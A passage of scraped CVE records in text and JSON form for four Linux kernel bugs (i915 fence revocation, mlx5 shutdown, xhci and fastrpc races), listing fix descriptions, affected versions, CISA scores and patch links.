No justification was provided on why we might then expect idleness of
vma->fence->active without first waiting on it.
The issue can be potentially caused by a race among revocation of fence
registers on one side and sequential execution of signal callbacks invoked
on completion of a request that was using them on the other, still
processed in parallel to revocation of those fence registers. Fix it by
waiting for idleness of vma->fence->active in i915_vma_revoke_fence().
(cherry picked from commit 24bb052d3dd499c5956abad5f7d8e4fd07da7fb1)
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 Version: 0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.416Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f771b91f21c46ad1217328d05e72a2c7e3add535"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/29c0fdf49078ab161570d3d1c6e13d66f182717d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca0fabd365a27a94a36e68a7a02df8ff3c13dac6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06dec31a0a5112a91f49085e8a8fa1a82296d5c7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/414f4a31f7a811008fd9a33b06216b060bad18fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/996c3412a06578e9d779a16b9e79ace18125ab50"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41092",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:20:35.535942Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:56.013Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f771b91f21c46ad1217328d05e72a2c7e3add535",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
},
{
"lessThan": "29c0fdf49078ab161570d3d1c6e13d66f182717d",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
},
{
"lessThan": "ca0fabd365a27a94a36e68a7a02df8ff3c13dac6",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
},
{
"lessThan": "06dec31a0a5112a91f49085e8a8fa1a82296d5c7",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
},
{
"lessThan": "414f4a31f7a811008fd9a33b06216b060bad18fc",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
},
{
"lessThan": "996c3412a06578e9d779a16b9e79ace18125ab50",
"status": "affected",
"version": "0d86ee35097ae0f1c2c50f2b8035ef480e25e4f1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915/gt: Fix potential UAF by revoke of fence registers\n\nCI has been sporadically reporting the following issue triggered by\nigt@i915_selftest@live@hangcheck on ADL-P and similar machines:\n\n\u003c6\u003e [414.049203] i915: Running intel_hangcheck_live_selftests/igt_reset_evict_fence\n...\n\u003c6\u003e [414.068804] i915 0000:00:02.0: [drm] GT0: GUC: submission enabled\n\u003c6\u003e [414.068812] i915 0000:00:02.0: [drm] GT0: GUC: SLPC enabled\n\u003c3\u003e [414.070354] Unable to pin Y-tiled fence; err:-4\n\u003c3\u003e [414.071282] i915_vma_revoke_fence:301 GEM_BUG_ON(!i915_active_is_idle(\u0026fence-\u003eactive))\n...\n\u003c4\u003e[ 609.603992] ------------[ cut here ]------------\n\u003c2\u003e[ 609.603995] kernel BUG at drivers/gpu/drm/i915/gt/intel_ggtt_fencing.c:301!\n\u003c4\u003e[ 609.604003] invalid opcode: 0000 [#1] PREEMPT SMP NOPTI\n\u003c4\u003e[ 609.604006] CPU: 0 PID: 268 Comm: kworker/u64:3 Tainted: G U W 6.9.0-CI_DRM_14785-g1ba62f8cea9c+ #1\n\u003c4\u003e[ 609.604008] Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-P DDR4 RVP, BIOS RPLPFWI1.R00.4035.A00.2301200723 01/20/2023\n\u003c4\u003e[ 609.604010] Workqueue: i915 __i915_gem_free_work [i915]\n\u003c4\u003e[ 609.604149] RIP: 0010:i915_vma_revoke_fence+0x187/0x1f0 [i915]\n...\n\u003c4\u003e[ 609.604271] Call Trace:\n\u003c4\u003e[ 609.604273] \u003cTASK\u003e\n...\n\u003c4\u003e[ 609.604716] __i915_vma_evict+0x2e9/0x550 [i915]\n\u003c4\u003e[ 609.604852] __i915_vma_unbind+0x7c/0x160 [i915]\n\u003c4\u003e[ 609.604977] force_unbind+0x24/0xa0 [i915]\n\u003c4\u003e[ 609.605098] i915_vma_destroy+0x2f/0xa0 [i915]\n\u003c4\u003e[ 609.605210] __i915_gem_object_pages_fini+0x51/0x2f0 [i915]\n\u003c4\u003e[ 609.605330] __i915_gem_free_objects.isra.0+0x6a/0xc0 [i915]\n\u003c4\u003e[ 609.605440] process_scheduled_works+0x351/0x690\n...\n\nIn the past, there were similar failures reported by CI from other IGT\ntests, observed on other platforms.\n\nBefore commit 63baf4f3d587 (\"drm/i915/gt: Only wait for GPU activity\nbefore unbinding a GGTT fence\"), i915_vma_revoke_fence() was waiting for\nidleness of vma-\u003eactive via fence_update(). That commit introduced\nvma-\u003efence-\u003eactive in order for the fence_update() to be able to wait\nselectively on that one instead of vma-\u003eactive since only idleness of\nfence registers was needed. But then, another commit 0d86ee35097a\n(\"drm/i915/gt: Make fence revocation unequivocal\") replaced the call to\nfence_update() in i915_vma_revoke_fence() with only fence_write(), and\nalso added that GEM_BUG_ON(!i915_active_is_idle(\u0026fence-\u003eactive)) in front.\nNo justification was provided on why we might then expect idleness of\nvma-\u003efence-\u003eactive without first waiting on it.\n\nThe issue can be potentially caused by a race among revocation of fence\nregisters on one side and sequential execution of signal callbacks invoked\non completion of a request that was using them on the other, still\nprocessed in parallel to revocation of those fence registers. Fix it by\nwaiting for idleness of vma-\u003efence-\u003eactive in i915_vma_revoke_fence().\n\n(cherry picked from commit 24bb052d3dd499c5956abad5f7d8e4fd07da7fb1)"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:54.366Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f771b91f21c46ad1217328d05e72a2c7e3add535"
},
{
"url": "https://git.kernel.org/stable/c/29c0fdf49078ab161570d3d1c6e13d66f182717d"
},
{
"url": "https://git.kernel.org/stable/c/ca0fabd365a27a94a36e68a7a02df8ff3c13dac6"
},
{
"url": "https://git.kernel.org/stable/c/06dec31a0a5112a91f49085e8a8fa1a82296d5c7"
},
{
"url": "https://git.kernel.org/stable/c/414f4a31f7a811008fd9a33b06216b060bad18fc"
},
{
"url": "https://git.kernel.org/stable/c/996c3412a06578e9d779a16b9e79ace18125ab50"
}
],
"title": "drm/i915/gt: Fix potential UAF by revoke of fence registers",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41092",
"datePublished": "2024-07-29T15:48:05.853Z",
"dateReserved": "2024-07-12T12:17:45.636Z",
"dateUpdated": "2025-05-04T09:21:54.366Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43866 (GCVE-0-2024-43866)
Vulnerability from cvelistv5
Published
2024-08-20 23:50
Modified
2025-05-04 12:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Always drain health in shutdown callback
There is no point in recovery during device shutdown. if health
work started need to wait for it to avoid races and NULL pointer
access.
Hence, drain health WQ on shutdown callback.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43866",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:35.774939Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:19.231Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/main.c",
"drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5005e2e159b300c1b8c6820a1e13a62eb0127b9b",
"status": "affected",
"version": "d2aa060d40fa060e963f9a356d43481e43ba3dac",
"versionType": "git"
},
{
"lessThan": "6b6c2ebd83f2bf97e8f221479372aaca97a4a9b2",
"status": "affected",
"version": "d2aa060d40fa060e963f9a356d43481e43ba3dac",
"versionType": "git"
},
{
"lessThan": "6048dec754554a1303d632be6042d3feb3295285",
"status": "affected",
"version": "d2aa060d40fa060e963f9a356d43481e43ba3dac",
"versionType": "git"
},
{
"lessThan": "1b75da22ed1e6171e261bc9265370162553d5393",
"status": "affected",
"version": "d2aa060d40fa060e963f9a356d43481e43ba3dac",
"versionType": "git"
},
{
"status": "affected",
"version": "63d10e93df94c93bdeac87a9401696b1edadb7ed",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/main.c",
"drivers/net/ethernet/mellanox/mlx5/core/sf/dev/driver.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.113",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.113",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.13.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Always drain health in shutdown callback\n\nThere is no point in recovery during device shutdown. if health\nwork started need to wait for it to avoid races and NULL pointer\naccess.\n\nHence, drain health WQ on shutdown callback."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:58:14.665Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5005e2e159b300c1b8c6820a1e13a62eb0127b9b"
},
{
"url": "https://git.kernel.org/stable/c/6b6c2ebd83f2bf97e8f221479372aaca97a4a9b2"
},
{
"url": "https://git.kernel.org/stable/c/6048dec754554a1303d632be6042d3feb3295285"
},
{
"url": "https://git.kernel.org/stable/c/1b75da22ed1e6171e261bc9265370162553d5393"
}
],
"title": "net/mlx5: Always drain health in shutdown callback",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43866",
"datePublished": "2024-08-20T23:50:49.364Z",
"dateReserved": "2024-08-17T09:11:59.280Z",
"dateUpdated": "2025-05-04T12:58:14.665Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52898 (GCVE-0-2023-52898)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-21 08:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
xhci: Fix null pointer dereference when host dies
Make sure xhci_free_dev() and xhci_kill_endpoint_urbs() do not race
and cause null pointer dereference when host suddenly dies.
Usb core may call xhci_free_dev() which frees the xhci->devs[slot_id]
virt device at the same time that xhci_kill_endpoint_urbs() tries to
loop through all the device's endpoints, checking if there are any
cancelled urbs left to give back.
hold the xhci spinlock while freeing the virt device
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 Version: 11ec7588a10d4bc2e1e385ac565d2166d375fba1 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:03:37.248352Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:16.551Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6fac4b5cecb3928a0a81069aaa815a2edc8dd5a1",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
},
{
"lessThan": "133b902378e4acbd824c29dd0d48570ad596e368",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
},
{
"lessThan": "081105213ff6f661c114781d469233c7d0e09c2e",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
},
{
"lessThan": "c462ac871f49753eca86bb960f573b993976a5ea",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
},
{
"lessThan": "ea2ee5e9991caf74e0604f994c1831a5867055b2",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
},
{
"lessThan": "a2bc47c43e70cf904b1af49f76d572326c08bca7",
"status": "affected",
"version": "11ec7588a10d4bc2e1e385ac565d2166d375fba1",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/host/xhci.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.15"
},
{
"lessThan": "4.15",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.271",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.271",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "4.15",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "4.15",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: Fix null pointer dereference when host dies\n\nMake sure xhci_free_dev() and xhci_kill_endpoint_urbs() do not race\nand cause null pointer dereference when host suddenly dies.\n\nUsb core may call xhci_free_dev() which frees the xhci-\u003edevs[slot_id]\nvirt device at the same time that xhci_kill_endpoint_urbs() tries to\nloop through all the device\u0027s endpoints, checking if there are any\ncancelled urbs left to give back.\n\nhold the xhci spinlock while freeing the virt device"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T08:49:59.730Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6fac4b5cecb3928a0a81069aaa815a2edc8dd5a1"
},
{
"url": "https://git.kernel.org/stable/c/133b902378e4acbd824c29dd0d48570ad596e368"
},
{
"url": "https://git.kernel.org/stable/c/081105213ff6f661c114781d469233c7d0e09c2e"
},
{
"url": "https://git.kernel.org/stable/c/c462ac871f49753eca86bb960f573b993976a5ea"
},
{
"url": "https://git.kernel.org/stable/c/ea2ee5e9991caf74e0604f994c1831a5867055b2"
},
{
"url": "https://git.kernel.org/stable/c/a2bc47c43e70cf904b1af49f76d572326c08bca7"
}
],
"title": "xhci: Fix null pointer dereference when host dies",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52898",
"datePublished": "2024-08-21T06:10:38.365Z",
"dateReserved": "2024-08-21T06:07:11.014Z",
"dateUpdated": "2025-05-21T08:49:59.730Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48872 (GCVE-0-2022-48872)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
misc: fastrpc: Fix use-after-free race condition for maps
It is possible that in between calling fastrpc_map_get() until
map->fl->lock is taken in fastrpc_free_map(), another thread can call
fastrpc_map_lookup() and get a reference to a map that is about to be
deleted.
Rewrite fastrpc_map_get() to only increase the reference count of a map
if it's non-zero. Propagate this to callers so they can know if a map is
about to be deleted.
Fixes this warning:
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 5 PID: 10100 at lib/refcount.c:25 refcount_warn_saturate
...
Call trace:
refcount_warn_saturate
[fastrpc_map_get inlined]
[fastrpc_map_lookup inlined]
fastrpc_map_create
fastrpc_internal_invoke
fastrpc_device_ioctl
__arm64_sys_ioctl
invoke_syscall
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48872",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:25.671974Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:54.076Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/misc/fastrpc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "556dfdb226ce1e5231d8836159b23f8bb0395bf4",
"status": "affected",
"version": "c68cfb718c8f97b7f7a50ed66be5feb42d0c8988",
"versionType": "git"
},
{
"lessThan": "b171d0d2cf1b8387c72c8d325c5d5746fa271e39",
"status": "affected",
"version": "c68cfb718c8f97b7f7a50ed66be5feb42d0c8988",
"versionType": "git"
},
{
"lessThan": "61a0890cb95afec5c8a2f4a879de2b6220984ef1",
"status": "affected",
"version": "c68cfb718c8f97b7f7a50ed66be5feb42d0c8988",
"versionType": "git"
},
{
"lessThan": "079c78c68714f7d8d58e66c477b0243b31806907",
"status": "affected",
"version": "c68cfb718c8f97b7f7a50ed66be5feb42d0c8988",
"versionType": "git"
},
{
"lessThan": "96b328d119eca7563c1edcc4e1039a62e6370ecb",
"status": "affected",
"version": "c68cfb718c8f97b7f7a50ed66be5feb42d0c8988",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/misc/fastrpc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.230",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.230",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.165",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.90",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.8",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: fastrpc: Fix use-after-free race condition for maps\n\nIt is possible that in between calling fastrpc_map_get() until\nmap-\u003efl-\u003elock is taken in fastrpc_free_map(), another thread can call\nfastrpc_map_lookup() and get a reference to a map that is about to be\ndeleted.\n\nRewrite fastrpc_map_get() to only increase the reference count of a map\nif it\u0027s non-zero. Propagate this to callers so they can know if a map is\nabout to be deleted.\n\nFixes this warning:\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 5 PID: 10100 at lib/refcount.c:25 refcount_warn_saturate\n...\nCall trace:\n refcount_warn_saturate\n [fastrpc_map_get inlined]\n [fastrpc_map_lookup inlined]\n fastrpc_map_create\n fastrpc_internal_invoke\n fastrpc_device_ioctl\n __arm64_sys_ioctl\n invoke_syscall"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:13.379Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/556dfdb226ce1e5231d8836159b23f8bb0395bf4"
},
{
"url": "https://git.kernel.org/stable/c/b171d0d2cf1b8387c72c8d325c5d5746fa271e39"
},
{
"url": "https://git.kernel.org/stable/c/61a0890cb95afec5c8a2f4a879de2b6220984ef1"
},
{
"url": "https://git.kernel.org/stable/c/079c78c68714f7d8d58e66c477b0243b31806907"
},
{
"url": "https://git.kernel.org/stable/c/96b328d119eca7563c1edcc4e1039a62e6370ecb"
}
],
"title": "misc: fastrpc: Fix use-after-free race condition for maps",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
